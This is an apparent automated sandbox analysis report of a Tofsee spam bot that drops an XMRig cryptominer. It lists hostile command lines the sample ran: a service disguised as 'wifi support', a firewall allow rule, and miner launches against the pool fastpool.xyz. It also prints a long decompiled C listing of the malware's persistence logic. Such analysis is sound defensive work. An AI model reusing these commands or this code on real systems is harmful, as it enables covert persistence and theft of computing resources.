Sep 5, 2021 15:52:40.247360945 CEST	8.8.8.8	192.168.2.4	0x1bc7	No error (0)	mail.h-email.net		34.220.245.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:41.871918917 CEST	8.8.8.8	192.168.2.4	0x515	No error (0)	www.google.com		172.217.168.68	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:42.098021984 CEST	8.8.8.8	192.168.2.4	0xa18d	No error (0)	xn--wolno-sowa-uhb42e7j.slask.pl			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:42.178730965 CEST	8.8.8.8	192.168.2.4	0xfe06	No error (0)	mail.xn--wolno-sowa-uhb42e7j.slask.pl		51.68.132.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:42.913156033 CEST	8.8.8.8	192.168.2.4	0x8926	No error (0)	mixmail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:42.970459938 CEST	8.8.8.8	192.168.2.4	0xf8fa	No error (0)	ing.wanadoo.es		62.36.20.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:43.117012978 CEST	8.8.8.8	192.168.2.4	0xe5e4	No error (0)	mail01.jeffersonbox.com		161.156.29.45	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.google.com

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: HsWJJz7nq4.exe PID: 5588 Parent PID: 6476

General

Start time:	15:49:54
Start date:	05/09/2021
Path:	C:\Users\user\Desktop\HsWJJz7nq4.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\HsWJJz7nq4.exe'
Imagebase:	0x400000
File size:	266752 bytes
MD5 hash:	8B7286786C1F017E5002E0BA66BFAE58
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000003.643630802.0000000002250000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3000 Parent PID: 5588

General

Start time:	15:49:57
Start date:	05/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /C mkdir C:\Windows\SysWOW64\mmeemcze\
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6216 Parent PID: 3000

General

Start time:	15:49:57
Start date:	05/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4112 Parent PID: 5588

General

Start time:	15:49:57
Start date:	05/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\kwrovuui.exe' C:\Windows\SysWOW64\mmeemcze\
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7072 Parent PID: 4112

General

Start time:	15:49:58
Start date:	05/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: sc.exe PID: 4244 Parent PID: 5588

General

Start time:	15:49:58
Start date:	05/09/2021
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\sc.exe' create mmeemcze binPath= 'C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe /d\'C:\Users\user\Desktop\HsWJJz7nq4.exe\'' type= own start= auto DisplayName= 'wifi support'
Imagebase:	0xe80000
File size:	60928 bytes
MD5 hash:	24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6856 Parent PID: 4244

General

Start time:	15:49:59
Start date:	05/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: sc.exe PID: 4260 Parent PID: 5588

General

Start time:	15:49:59
Start date:	05/09/2021
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\sc.exe' description mmeemcze 'wifi internet conection'
Imagebase:	0xe80000
File size:	60928 bytes
MD5 hash:	24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6868 Parent PID: 4260

General

Start time:	15:50:00
Start date:	05/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: sc.exe PID: 984 Parent PID: 5588

General

Start time:	15:50:00
Start date:	05/09/2021
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\sc.exe' start mmeemcze
Imagebase:	0xe80000
File size:	60928 bytes
MD5 hash:	24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3408 Parent PID: 984

General

Start time:	15:50:00
Start date:	05/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: kwrovuui.exe PID: 5672 Parent PID: 568

General

Start time:	15:50:04
Start date:	05/09/2021
Path:	C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe /d'C:\Users\user\Desktop\HsWJJz7nq4.exe'
Imagebase:	0x400000
File size:	14717440 bytes
MD5 hash:	8A7DE3BAB4AD35E52859C6BCEF5640A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000E.00000002.665871062.0000000002230000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000E.00000003.664485787.0000000002180000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: netsh.exe PID: 740 Parent PID: 5588

General

Start time:	15:50:01
Start date:	05/09/2021
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\netsh.exe' advfirewall firewall add rule name='Host-process for services of Windows' dir=in action=allow program='C:\Windows\SysWOW64\svchost.exe' enable=yes>nul
Imagebase:	0x9f0000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5744 Parent PID: 740

General

Start time:	15:50:01
Start date:	05/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6612 Parent PID: 568

General

Start time:	15:50:05
Start date:	05/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6076 Parent PID: 5672

General

Start time:	15:50:05
Start date:	05/09/2021
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	svchost.exe
Imagebase:	0xad0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: XMRIG_Monero_Miner, Description: Detects Monero mining software, Source: 00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp, Author: Florian Roth Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp, Author: Joe Security Rule: MINER_monero_mining_detection, Description: Monero mining software, Source: 00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp, Author: Christiaan Beek \| McAfee ATR Team Rule: XMRIG_Monero_Miner, Description: Detects Monero mining software, Source: 00000012.00000003.679731110.000000000AF00000.00000004.00000001.sdmp, Author: Florian Roth Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000003.679731110.000000000AF00000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000003.679731110.000000000AF00000.00000004.00000001.sdmp, Author: Joe Security Rule: MINER_monero_mining_detection, Description: Monero mining software, Source: 00000012.00000003.679731110.000000000AF00000.00000004.00000001.sdmp, Author: Christiaan Beek \| McAfee ATR Team

Chronological Activities

Analysis Process: svchost.exe PID: 5308 Parent PID: 6076

General

Start time:	15:50:12
Start date:	05/09/2021
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
Imagebase:	0xad0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4420 Parent PID: 5308

General

Start time:	15:50:12
Start date:	05/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: HsWJJz7nq4.exe PID: 5588 Parent PID: 6476 HsWJJz7nq4.exeCOMMON

Executed Functions

Function 00409A6B, Relevance: 98.8, APIs: 48, Strings: 8, Instructions: 799
stringsleepregistryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			_entry_(CHAR* _a12, void* _a15) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				char _v28;
				char _v32;
				union _GET_FILEEX_INFO_LEVELS _v36;
				CHAR* _v40;
				char _v44;
				char _v48;
				struct _PROCESS_INFORMATION _v64;
				char _v80;
				char _v112;
				char _v371;
				char _v372;
				char _v671;
				char _v672;
				char _v704;
				struct _STARTUPINFOA _v772;
				char _v1271;
				char _v1272;
				char _v1672;
				char _t238;
				long _t239;
				char _t242;
				long _t244;
				CHAR* _t248;
				char _t250;
				intOrPtr _t257;
				char _t267;
				intOrPtr* _t272;
				char _t276;
				char _t279;
				char _t282;
				char _t283;
				void* _t284;
				char _t294;
				CHAR* _t303;
				int _t304;
				char _t309;
				CHAR* _t312;
				char _t318;
				void* _t324;
				CHAR* _t325;
				char _t328;
				char* _t331;
				char _t332;
				char _t340;
				char _t344;
				CHAR* _t357;
				CHAR* _t358;
				int _t359;
				int _t373;
				long _t379;
				void* _t383;
				void* _t396;
				void* _t401;
				char _t402;
				char _t403;
				intOrPtr* _t410;
				void* _t411;
				char _t417;
				char _t418;
				void* _t424;
				intOrPtr _t426;
				void* _t428;
				char* _t436;
				void* _t438;
				void* _t440;
				intOrPtr _t445;
				CHAR* _t446;
				char _t447;
				char _t452;
				void* _t460;
				void* _t461;
				char _t469;
				void* _t474;
				void* _t475;
				void* _t477;
				void* _t478;
				void* _t479;
				void* _t480;
				void* _t481;
				void* _t484;
				intOrPtr _t485;

				SetErrorMode(3); // executed
				SetErrorMode(3); // executed
				SetUnhandledExceptionFilter(E00406511); // executed
				E0040EC54(); // executed
				_t485 =  *0x41201f; // 0x0
				if(_t485 != 0) {
					__eflags =  *0x4133d8;
					if(__eflags == 0) {
						L126:
						CreateThread(0, 0, 0x40405e, 0, 0, 0);
						__imp__#115(0x1010,  &_v1672);
						E0040E52E(_t459, __eflags);
						E0040EAAF(1, 0);
						E00401D96(_t438, 0x412118);
						E004080C9(_t438);
						CreateThread(0, 0, E0040877E, 0, 0, 0);
						E00405E6C(__eflags);
						E00403132();
						E0040C125(__eflags);
						E00408DB1(_t438);
						Sleep(0xbb8);
						E0040C4EE();
						while(1) {
							__eflags =  *0x4133d0;
							if( *0x4133d0 == 0) {
								goto L129;
							}
							_t239 = GetTickCount();
							__eflags = _t239 -  *0x4133d0 - 0x186a0;
							if(_t239 -  *0x4133d0 < 0x186a0) {
								L131:
								Sleep(0x2710);
								continue;
							}
							L129:
							_t238 = E0040C913();
							__eflags = _t238;
							if(_t238 == 0) {
								 *0x4133d0 = GetTickCount();
							}
							goto L131;
						}
					}
					_a12 = 0xa;
					while(1) {
						_t242 = DeleteFileA(0x4133d8);
						__eflags = _t242;
						if(_t242 != 0) {
							break;
						}
						__eflags = _a12;
						if(_a12 <= 0) {
							break;
						}
						_t244 = GetLastError();
						__eflags = _t244 - 2;
						if(_t244 == 2) {
							break;
						}
						_t219 =  &_a12;
						 *_t219 = _a12 - 1;
						__eflags =  *_t219;
						Sleep(0x3e8);
					}
					E0040EE2A(_t438, 0x4133d8, 0, 0x104);
					_t475 = _t475 + 0xc;
					goto L126;
				} else {
					_v12 = 0;
					if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) == 0) {
						_v672 = 0;
					}
					if(_v672 == 0x22) {
						E0040EF00( &_v672,  &_v671);
						_t436 = E0040ED23( &_v672, 0x22);
						_t475 = _t475 + 0x10;
						if(_t436 != 0) {
							 *_t436 = 0;
						}
					}
					_t248 = GetCommandLineA();
					_t469 = 0x4122f8;
					_a12 = _t248;
					_t250 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a48, 4, 0xe4, 0xc8));
					_t464 = 0x100;
					_v8 = _t250;
					E0040EE2A(_t438, 0x4122f8, 0, 0x100);
					_t477 = _t475 + 0x28;
					if(_v8 == 0) {
						_t257 = E004096AA( &_v672,  &_v48,  &_v44,  &_v372,  &_v112); // executed
						_t477 = _t477 + 0x14;
						_v16 = _t257;
						if(_t257 == 0) {
							E0040EF00(0x4121a8,  &_v672);
							_pop(_t440);
							_a12 = GetCommandLineA();
							_v8 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a38, 4, 0xe4, 0xc8));
							E0040EE2A(_t440, 0x4122f8, 0, 0x100);
							_t478 = _t477 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								L102:
								_v8 = E0040EE95(_a12, E00402544(_t469, 0x410a28, 4, 0xe4, 0xc8));
								E0040EE2A(_t440, _t469, 0, _t464);
								_t477 = _t478 + 0x28;
								__eflags = _v8;
								if(_v8 == 0) {
									L110:
									_t267 = E00406EC3();
									__eflags = _t267;
									if(_t267 != 0) {
										E004098F2();
										L19:
										ExitProcess(0); // executed
									}
									__eflags = _v372;
									if(_v372 == 0) {
										L116:
										 *0x4133b0 = 0;
										L117:
										_v64.hProcess =  &_v372;
										_v64.hThread = E00409961;
										_v64.dwProcessId = 0;
										_v64.dwThreadId = 0;
										StartServiceCtrlDispatcherA( &_v64);
										goto L19;
									}
									_t272 =  &_v372;
									_t459 = _t272 + 1;
									do {
										_t447 =  *_t272;
										_t272 = _t272 + 1;
										__eflags = _t447;
									} while (_t447 != 0);
									__eflags = _t272 - _t459 - 0x20;
									if(_t272 - _t459 >= 0x20) {
										goto L116;
									}
									E0040EF00(0x4133b0,  &_v372);
									goto L117;
								}
								_t469 = _v8 + 3;
								_t276 = E0040ED03(_t469, 0x20);
								__eflags = _t276;
								if(_t276 != 0) {
									L107:
									_t464 = _t276 - _t469;
									__eflags = _t464 - 0x20;
									if(_t464 >= 0x20) {
										_t464 = 0x1f;
									}
									E0040EE08(0x412184, _t469, _t464);
									_t477 = _t477 + 0xc;
									 *((char*)(_t464 + 0x412184)) = 0;
									goto L110;
								}
								_t279 = _t469;
								_t459 = _t279 + 1;
								do {
									_t452 =  *_t279;
									_t279 = _t279 + 1;
									__eflags = _t452;
								} while (_t452 != 0);
								_t276 = _t279 - _t459 + _t469;
								__eflags = _t276;
								goto L107;
							}
							_t282 = _v8 + 3;
							_v672 = 0;
							__eflags =  *_t282 - 0x22;
							_v20 = _t282;
							if( *_t282 != 0x22) {
								_t283 = E0040ED03(_v20, 0x20);
								_pop(_t440);
								__eflags = _t283;
								if(_t283 == 0) {
									_t283 =  &(_a12[lstrlenA(_a12)]);
									__eflags = _t283;
								}
								_t284 = _t283 - _v8;
								_v24 = _t284;
								__eflags = _t284 + 0xfffffffd;
								E0040EE08( &_v672, _v20, _t284 + 0xfffffffd);
								 *((char*)(_t474 + _v24 - 0x29f)) = 0;
								L98:
								_t478 = _t478 + 0xc;
								L99:
								__eflags = _v672;
								if(_v672 != 0) {
									E0040EE08(0x4133d8,  &_v672, 0x103);
									_t478 = _t478 + 0xc;
								}
								 *0x412cc0 = 1;
								goto L102;
							}
							_v20 = _v8 + 4;
							_t294 = E0040ED03(_v8 + 4, 0x22);
							_pop(_t440);
							__eflags = _t294;
							if(_t294 == 0) {
								goto L99;
							}
							_v24 = _t294 - _v8;
							E0040EE08( &_v672, _v20, _t294 - _v8 + 0xfffffffc);
							 *((char*)(_t474 + _v24 - 0x2a0)) = 0;
							goto L98;
						}
						_v36 = 0;
						if(_t257 >= 4 || _v48 > 0x5e && _v44 != 0) {
							L84:
							if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) != 0) {
								_t303 =  &_v672;
								if(_v672 == 0x22) {
									_t303 =  &_v671;
								}
								if(_t303[1] == 0x3a && _t303[2] == 0x5c) {
									_t303[3] = 0;
									_t304 = GetDriveTypeA(_t303);
									_t525 = _t304 - 2;
									if(_t304 != 2) {
										_push(1);
										E00409145(_t525);
									}
								}
							}
							goto L19;
						} else {
							E00404280(1); // executed
							_pop(_t441);
							if(_v672 == 0) {
								goto L84;
							}
							_t309 = E0040675C( &_v672,  &_v12, 0); // executed
							_t477 = _t477 + 0xc;
							_v8 = _t309;
							if(_t309 == 0 || _v12 == 0) {
								goto L84;
							} else {
								_v32 = 0;
								_v28 = 0;
								if(_v16 == 2) {
									L55:
									__eflags = _v16 - 3;
									if(_v16 >= 3) {
										L83:
										E0040EC2E(_v8);
										if(_v36 != 0) {
											goto L19;
										}
										goto L84;
									}
									_t312 = E00402544(_t469, 0x410a3c, 0xc, 0xe4, 0xc8);
									_t479 = _t477 + 0x14;
									__eflags = GetEnvironmentVariableA(_t312,  &_v1272, 0x1f4);
									if(__eflags == 0) {
										L82:
										E0040EE2A(_t441, _t469, 0, _t464);
										_t477 = _t479 + 0xc;
										goto L83;
									}
									_t318 = E004099D2(_t459, __eflags,  &_v1272,  &_v672,  &_v704, _v8, _v12);
									_t479 = _t479 + 0x14;
									__eflags = _t318;
									if(_t318 == 0) {
										goto L82;
									}
									E0040EE2A(_t441, _t469, 0, _t464);
									_t480 = _t479 + 0xc;
									_v1272 = 0x22;
									lstrcpyA( &_v1271,  &_v672);
									_t324 = RtlAllocateHeap( &_v1272); // executed
									 *((char*)(_t474 + _t324 - 0x4f4)) = 0x22;
									_t325 = _t324 + 1;
									__eflags = _v16 - 2;
									_a12 = _t325;
									 *((char*)(_t474 + _t325 - 0x4f4)) = 0;
									if(_v16 != 2) {
										L60:
										_push(0);
										_push( &_v112);
										_t328 = E00406DC2(_t441) ^ 0x5e5e5e5e;
										__eflags = _t328;
										_push(_t328);
										E0040F133();
										_t480 = _t480 + 0xc;
										L61:
										_t331 = E00402544(_t469,  &E004106AC, 0x2e, 0xe4, 0xc8);
										_t481 = _t480 + 0x14;
										_t332 = RegOpenKeyExA(0x80000001, _t331, 0, 0x103,  &_v24);
										_v20 = _t332;
										__eflags = _t332;
										if(_t332 == 0) {
											_t373 =  &(_a12[1]);
											__eflags = _t373;
											_v20 = RegSetValueExA(_v24,  &_v112, 0, 1,  &_v1272, _t373);
											RegCloseKey(_v24);
										}
										E0040EE2A(_t441, _t469, 0, _t464);
										E0040EE2A(_t441,  &_v772, 0, 0x44);
										_v772.cb = 0x44;
										E0040EE2A(_t441,  &_v64, 0, 0x10);
										_t479 = _t481 + 0x24;
										_t340 = GetModuleFileNameA(GetModuleHandleA(0),  &_v372, 0x104);
										__eflags = _t340;
										if(_t340 != 0) {
											__eflags = _v372 - 0x22;
											_t357 =  &_v372;
											_v40 = _t357;
											if(_v372 == 0x22) {
												_t357 =  &_v371;
												_v40 = _t357;
											}
											__eflags =  *((char*)(_t357 + 1)) - 0x3a;
											if( *((char*)(_t357 + 1)) == 0x3a) {
												__eflags =  *((char*)(_t357 + 2)) - 0x5c;
												if( *((char*)(_t357 + 2)) == 0x5c) {
													_t358 = _v40;
													_t441 = _t358[3];
													_a15 = _t358[3];
													_t358[3] = 0;
													_t359 = GetDriveTypeA(_t358);
													__eflags = _t359 - 2;
													if(_t359 != 2) {
														_t441 = _v40;
														_v40[3] = _a15;
														lstrcatA( &_v1272, E00402544(_t469, 0x410a38, 4, 0xe4, 0xc8));
														E0040EE2A(_v40, _t469, 0, _t464);
														_t479 = _t479 + 0x20;
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														lstrcatA( &_v1272,  &_v372);
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														_v36 = 1;
													}
												}
											}
										}
										__eflags = _v32;
										if(_v32 != 0) {
											__eflags = _v28;
											if(_v28 != 0) {
												wsprintfA( &_v372, "%X%08X", _v28, _v32);
												lstrcatA( &_v1272, E00402544(_t469, 0x410a28, 4, 0xe4, 0xc8));
												E0040EE2A(_t441, _t469, 0, _t464);
												_t479 = _t479 + 0x30;
												lstrcatA( &_v1272,  &_v372);
											}
										}
										_t344 = CreateProcessA(0,  &_v1272, 0, 0, 0, 0x8000000, 0, 0,  &_v772,  &_v64);
										__eflags = _t344;
										if(_t344 == 0) {
											DeleteFileA( &_v672);
											_v36 = 0;
										}
										__eflags = _v16 - 1;
										if(_v16 == 1) {
											__eflags = _v20;
											if(_v20 == 0) {
												E004096FF(_t441);
											}
										}
										goto L82;
									}
									__eflags = _v112;
									if(_v112 != 0) {
										goto L61;
									}
									goto L60;
								}
								_t379 = GetTempPathA(0x1f4,  &_v1272);
								_t504 = _t379;
								if(_t379 == 0) {
									goto L55;
								}
								_t383 = E004099D2(_t459, _t504,  &_v1272,  &_v672,  &_v704, _v8, _v12); // executed
								_t477 = _t477 + 0x14;
								if(_t383 == 0) {
									goto L55;
								}
								_v80 = 0;
								if(_v16 < 3 || _v372 == 0) {
									_push(0);
									_push( &_v80);
									_push(E00406DC2(_t441) ^ 0x5e5e5e5e);
									E0040F133();
									_t484 = _t477 + 0xc;
									lstrcpyA( &_v372, E00406CC9(_t441));
									lstrcatA( &_v372,  &_v80);
									lstrcatA( &_v372,  &E0041070C);
									_t396 = 0;
									__eflags = 0;
									goto L43;
								} else {
									_t410 =  &_v372;
									_t460 = _t410 + 1;
									do {
										_t445 =  *_t410;
										_t410 = _t410 + 1;
									} while (_t445 != 0);
									_t411 = _t410 - _t460;
									if(_t411 > 0 &&  *((char*)(_t474 + _t411 - 0x171)) == 0x5c) {
										_t411 = _t411 - 1;
									}
									_t461 = _t411;
									if(_t411 <= 0) {
										L41:
										_t459 = _t461 - _t411;
										_a12 = _t461 - _t411;
										E0040EE08( &_v80, _t474 + _t411 - 0x170, _t461 - _t411);
										 *((char*)(_t474 + _a12 - 0x4c)) = 0;
										_t484 = _t477 + 0xc;
										_t396 = 1;
										L43:
										if(_v44 == 0 || _v48 < 0x50) {
											_t441 = 1;
											__eflags = 1;
										} else {
											_t441 = 0;
										}
										_push(_t441);
										_push(_t396);
										_push( &_v372);
										_push( &_v80);
										_push( &_v672);
										_push( &_v704);
										_t401 = E00409326(_t441, _t459);
										_t477 = _t484 + 0x18;
										if(_t401 == 0) {
											_t402 =  *0x41217c; // 0x0
											_v32 = _t402;
											_t403 =  *0x412180; // 0x0
											goto L54;
										} else {
											if(GetFileAttributesExA( &_v672, 0,  &(_v772.dwXCountChars)) != 0) {
												_t403 = 0x5e060108;
												 *0x412180 = 0x5e060108;
												 *0x41217c = 0;
												_v32 = 0;
												L54:
												_v28 = _t403;
												DeleteFileA( &_v672);
												goto L55;
											}
											_t469 = 1;
											if(_v16 == 1) {
												E004096FF(_t441);
											}
											_v36 = _t469;
											goto L83;
										}
									} else {
										_t446 =  &_v372;
										while( *((char*)(_t446 + _t411 - 1)) != 0x5c) {
											_t411 = _t411 - 1;
											if(_t411 > 0) {
												continue;
											}
											goto L41;
										}
										goto L41;
									}
								}
							}
						}
					}
					_t417 = _v8;
					_t464 = _t417 + 3;
					_v372 = 0;
					if( *((char*)(_t417 + 3)) != 0x22) {
						_t418 = E0040ED03(_t464, 0x20);
						__eflags = _t418;
						if(_t418 == 0) {
							_t418 =  &(_a12[lstrlenA(_a12)]);
							__eflags = _t418;
						}
						_t469 = _t418 - _v8;
						__eflags = _t469;
						E0040EE08( &_v372, _t464, _t469 - 3);
						 *((char*)(_t474 + _t469 - 0x173)) = 0;
						L13:
						_t477 = _t477 + 0xc;
						L14:
						if(_v372 != 0 && _v672 != 0) {
							_t424 = E0040675C( &_v672,  &_v12, 0);
							_t477 = _t477 + 0xc;
							if(_t424 != 0 && _v12 != 0) {
								_t426 = E00406A60(_t459,  &_v372, _t424, _v12);
								_t477 = _t477 + 0xc;
								_v12 = _t426;
							}
						}
						goto L19;
					}
					_t464 = _t417 + 4;
					_t428 = E0040ED03(_t417 + 4, 0x22);
					if(_t428 == 0) {
						goto L14;
					} else {
						_t469 = _t428 - _v8;
						E0040EE08( &_v372, _t464, _t469 - 4);
						 *((char*)(_t474 + _t469 - 0x174)) = 0;
						goto L13;
					}
				}
			}

0x00409a7f
0x00409a83
0x00409a8a
0x00409a90
0x00409a97
0x00409a9d
0x0040a3cc
0x0040a3d2
0x0040a41c
0x0040a42c
0x0040a43a
0x0040a440
0x0040a448
0x0040a452
0x0040a45a
0x0040a469
0x0040a46b
0x0040a470
0x0040a475
0x0040a47a
0x0040a48a
0x0040a48c
0x0040a497
0x0040a497
0x0040a49d
0x00000000
0x00000000
0x0040a49f
0x0040a4a7
0x0040a4ac
0x0040a4be
0x0040a4c3
0x00000000
0x0040a4c3
0x0040a4ae
0x0040a4ae
0x0040a4b3
0x0040a4b5
0x0040a4b9
